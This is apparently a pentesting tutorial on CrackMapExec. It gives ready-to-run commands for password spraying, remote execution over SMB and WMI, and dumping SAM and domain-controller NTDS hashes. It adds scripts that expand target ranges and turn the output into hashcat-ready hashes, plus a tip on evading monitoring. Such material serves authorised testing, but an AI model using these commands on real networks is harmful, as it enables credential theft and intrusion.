Crackmapexec
2023-05-06
3 min read
Official repo: https://github.com/Porchetta-Industries/CrackMapExec
Windows build: https://github.com/maaaaz/CrackMapExecWin
References:
- https://cangqingzhe.github.io/2020/08/26/%E5%85%B3%E4%BA%8E%E5%86%85%E7%BD%91%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8%E5%A5%97%E4%BB%B6%E7%9A%84%E5%88%A9%E7%94%A8%E6%80%BB%E7%BB%93/
- ivoidwarranties.tech/posts/pentesting-tuts/cme/crackmapexec/
Target format
Every protocol accepts targets as CIDR notation, single IP addresses, IP ranges (a last-octet range or a full start-end pair), hostnames, or a file containing one target per line. Several targets can be given on one command line.
crackmapexec <protocol> ms.evilcorp.org
crackmapexec <protocol> 192.168.1.0 192.168.0.2
crackmapexec <protocol> 192.168.1.0/24
crackmapexec <protocol> 192.168.1.0-28 10.0.0.1-67
crackmapexec <protocol> ~/targets.txt
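Before spraying a target list it is worth seeing exactly which hosts it expands to. The following is an added example, not CrackMapExec's own code: it expands the same target forms shown above (CIDR, last-octet range, full range, hostname, file of targets) into one host per line. It assumes that a CIDR block includes its network and broadcast addresses and that hostnames are passed through untouched.

```bash
#!/usr/bin/env bash
# Added example (not part of CrackMapExec): expand CME-style target specs into
# one host per line so a spray can be reviewed before it runs.
# Handled forms: 192.168.1.5, 192.168.1.0/24, 192.168.1.0-28, 10.0.0.1-10.0.0.67,
# a hostname, or a file with one target per line (blank lines skipped).
# Assumption: CIDR expansion includes network and broadcast addresses.

is_ipv4() { local re='^([0-9]{1,3}\.){3}[0-9]{1,3}$'; [[ $1 =~ $re ]]; }

# dotted quad -> 32-bit integer
ip2int() { local IFS=.; set -- $1; echo $(( ($1 << 24) | ($2 << 16) | ($3 << 8) | $4 )); }

# 32-bit integer -> dotted quad
int2ip() { echo "$(( ($1 >> 24) & 255 )).$(( ($1 >> 16) & 255 )).$(( ($1 >> 8) & 255 )).$(( $1 & 255 ))"; }

expand_target() {
  local t=$1 start end
  if [ -f "$t" ]; then                                  # file: recurse on every non-empty line
    local line
    while IFS= read -r line; do [ -n "$line" ] && expand_target "$line"; done < "$t"
    return
  fi
  if [[ $t == */* ]] && is_ipv4 "${t%/*}" && [[ ${t#*/} =~ ^[0-9]+$ ]]; then
    local prefix=${t#*/}                                # CIDR block
    local mask=$(( (0xFFFFFFFF << (32 - prefix)) & 0xFFFFFFFF ))
    start=$(( $(ip2int "${t%/*}") & mask ))
    end=$(( start | (~mask & 0xFFFFFFFF) ))
  elif [[ $t == *-* ]] && is_ipv4 "${t%-*}"; then
    local lhs=${t%-*} rhs=${t#*-}
    start=$(ip2int "$lhs")
    if is_ipv4 "$rhs"; then end=$(ip2int "$rhs")        # a.b.c.d-w.x.y.z
    else end=$(ip2int "${lhs%.*}.$rhs"); fi              # a.b.c.d-e: range in the last octet
  else
    echo "$t"; return                                    # hostname or single IP: pass through
  fi
  local i
  for ((i = start; i <= end; i++)); do int2ip "$i"; done
}

# Usage: expand_target 192.168.1.0-28; expand_target targets.txt | wc -l
```

A hostname containing a hyphen (ms-evilcorp.org) is not mistaken for a range because the range branch requires the left side to be an IPv4 address.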
Supported protocols (crackmapexec <protocol> --help lists the options of each one)
ssh own stuff using SSH
smb own stuff using SMB
ldap own stuff using LDAP
winrm own stuff using WINRM
mssql own stuff using MSSQL
Using credentials
crackmapexec <protocol> <target(s)> -u username -p password
crackmapexec <protocol> <target(s)> -u username -p 'Admin!123@'
Put passwords containing shell metacharacters (!, @, $, spaces) in single quotes, as in the second line, so the shell passes them through unchanged.
Brute forcing & spraying
crackmapexec <protocol> <target(s)> -u username1 -p password1 password2
crackmapexec <protocol> <target(s)> -u username1 username2 -p password1
crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -p ~/file_containing_passwords
crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -H ~/file_containing_ntlm_hashes
With several users and several passwords every combination is tried, so count the attempts each account will receive against the domain lockout threshold before running. --no-bruteforce pairs line N of the user file with line N of the password file instead of the full matrix, and --continue-on-success keeps testing the remaining credentials after the first valid one instead of stopping at it.
Common usage
Network enumeration & scanning
crackmapexec 192.168.1.1/24
Run without credentials, this prints for every host answering on 445 the OS version, hostname, domain and whether SMB signing is required, which is also the quickest way to spot hosts that can be relayed to. The protocol-less form is the old syntax; CME 5.x requires the protocol: crackmapexec smb 192.168.1.1/24.
Command execution
crackmapexec 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami
-x runs the command through cmd.exe; -X runs it through PowerShell instead. Execution needs admin rights on the host, which CME marks with (Pwn3d!) on the login line. As above, CME 5.x wants the protocol keyword: crackmapexec smb 192.168.10.11 ... -x whoami.
Executing commands over SMB (smbexec)
crackmapexec.exe -d medtech.com -u administrator -p xxx -t 1 host.txt --execm smbexec -x "whoami /user"
Executing commands over WMI
crackmapexec.exe -d medtech.com -u administrator -p xxxx -t 1 host.txt --execm wmi -x "whoami /user"
The .exe lines use the syntax of the older Windows build: -d is the domain, -t 1 limits the run to one thread, and --execm selects the execution method. The 5.x branch spells that option --exec-method and accepts wmiexec, smbexec, atexec and mmcexec. smbexec creates a temporary service on the target for each command (a service-install event in the System log), while wmiexec runs the command through WMI, so choose the method according to what the target's monitoring is likely to flag.
Dumping hashes
crackmapexec.exe -d . -u administrator -H xxxx:xxxx -t 1 --sam host.txt
-d . authenticates as a local account rather than a domain account, -H passes the NTLM hash (LM:NT, or the NT hash alone) so no cleartext password is needed, and --sam dumps the local SAM of every host in host.txt on which the credential has admin rights.
Dumping domain controller hashes
crackmapexec.exe -d rootkit -u administrator -p xxx -t 1 192.168.3.144 --ntds vss
--ntds vss takes a Volume Shadow Copy of ntds.dit on the DC and parses it; --ntds drsuapi pulls the same hashes over the DRSUAPI replication interface (the DCSync method) without copying the file. Both need administrative rights on the DC (drsuapi needs the replication rights that Domain Admins hold).
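After a run the two things worth pulling out of CME's output are the hosts where the credential is admin and the dumped hashes in a form a cracker accepts. The script below is an added example, not CrackMapExec's own code. Its sample output is constructed to follow CME's column layout (protocol, IP, port, hostname, message); the hosts, accounts and hashes in it are made up, except that 31d6cfe0d16ae931b73c59d7e0c089c0 really is the NT hash of the empty password.

```bash
#!/usr/bin/env bash
# Added example, not part of CrackMapExec: post-process CME output.
# The sample is constructed in CME's column layout; hosts, names and hashes are made up.
SAMPLE=$(mktemp)
cat > "$SAMPLE" <<'EOF'
SMB         192.168.3.140   445    WS01             [+] medtech.com\administrator:P@ssw0rd (Pwn3d!)
SMB         192.168.3.141   445    WS02             [+] medtech.com\administrator:P@ssw0rd
SMB         192.168.3.142   445    WS03             [-] medtech.com\administrator:P@ssw0rd STATUS_LOGON_FAILURE
SMB         192.168.3.140   445    WS01             Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
SMB         192.168.3.140   445    WS01             Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         192.168.3.140   445    WS01             svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
EOF

EMPTY_NT=31d6cfe0d16ae931b73c59d7e0c089c0   # NT hash of the empty password

# IPs on which the credential has admin rights: CME appends "(Pwn3d!)" to that login line.
# A valid login without the marker (WS02 above) is a foothold, not admin.
pwned_hosts() { awk '/\(Pwn3d!\)/ { print $2 }' "$@" | sort -u; }

# pwdump-style lines (user:rid:LM:NT:::) from --sam/--ntds -> "user:NT", the hashcat -m 1000 form.
sam_hashes() {
  awk '$5 ~ /^[^:]+:[0-9]+:[0-9a-fA-F]+:[0-9a-fA-F]+:::$/ { split($5, f, ":"); print f[1] ":" f[4] }' "$@"
}

# Accounts whose NT hash equals the empty-password hash: a finding on its own,
# and a hint that the account may be disabled (Guest) or genuinely passwordless.
empty_password_accounts() {
  sam_hashes "$@" | awk -F: -v e="$EMPTY_NT" '$2 == e { print $1 }'
}

# Usage on the constructed sample:
pwned_hosts "$SAMPLE"
sam_hashes "$SAMPLE"
empty_password_accounts "$SAMPLE"
```

Feed sam_hashes into hashcat -m 1000, and check the empty-hash accounts against the account status before reporting them, since a disabled account (commonly Guest) also shows the empty NT hash.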